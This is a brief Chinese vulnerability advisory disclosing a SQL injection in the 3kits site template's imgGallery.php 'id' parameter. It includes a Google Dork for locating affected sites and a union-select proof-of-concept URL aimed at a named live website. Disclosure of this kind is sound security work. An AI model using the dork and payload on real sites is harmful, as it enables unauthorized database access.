3kits模板SQL注入漏洞分析:imgGallery.php中id参数的安全隐患

本文披露了在3kits网站模板中发现的一处SQL注入漏洞。攻击者可通过imgGallery.php文件中的id参数,利用union select语句获取数据库版本信息,漏洞风险等级为中等,并提供验证POC。

3kits模板SQL注入漏洞:imgGallery.php的id参数

发布日期:2025.11.04 发现者:Hossein_0xB

风险等级:中等 攻击位置:远程 本地攻击:否

CVE编号:N/A CWE编号:N/A

Google Dork"Designed & Developed by 3kits"

漏洞详情

  • 漏洞标题:3kits - SQL注入漏洞
  • 发现日期:2025-11-03
  • 漏洞作者:Hossein_0xB
  • 分类:Web应用程序漏洞
  • 测试环境:Windows 10

概念验证 (Proof of Concept)

演示地址

1

https://hyderabadrealtors.org/imgGallery.php?id=-3 union select 1,version(),3,4

此POC利用id参数构造SQL注入攻击,通过union select语句获取数据库版本信息。

发现者:Hossein_0xB 邮箱:dastkherd.makoraan@gmail.com

comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次